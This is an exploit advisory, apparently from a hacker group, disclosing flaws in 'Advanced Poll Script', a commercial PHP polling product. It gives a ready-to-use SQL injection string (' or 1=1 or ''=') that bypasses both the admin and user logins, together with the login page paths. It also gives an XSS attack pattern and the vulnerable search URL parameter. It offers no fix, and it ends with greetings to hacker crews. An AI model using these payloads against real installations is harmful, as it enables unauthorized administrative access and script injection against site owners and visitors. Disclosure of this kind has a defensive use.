______________________________________________________________________________
XSS and Authentication bypass in Advanced Poll Script
Vendor:http://www.2daybiz.com/___________________________Author:Sid3^effects_________________________________
Description :
Advanced Poll is a polling system with powerful administration tool supports both text fileand MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature,and random poll support.
script cost :$140---------------------------------------------------------------------------* Authentication bypass:
The following script has authentication bypass in the admin login as well asin user login
use ' or 1=1 or ''='in both login and password.
user logindemo :http://server/polls/login.php
admin login demo: http://server/polls/admin/---------------------------------------------------------------------------* XSS (cross site scripting ):
XSS is also found in the search field.
Attack Pattern: '"-->
DEMO:http://server/polls/index_search.php?category=[XSS]---------------------------------------------------------------------------
ShoutZ :----------Indian Cyber warriors--Andhra hackers--
Greetz :-----------*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|<008---M4n0j--MayUr--
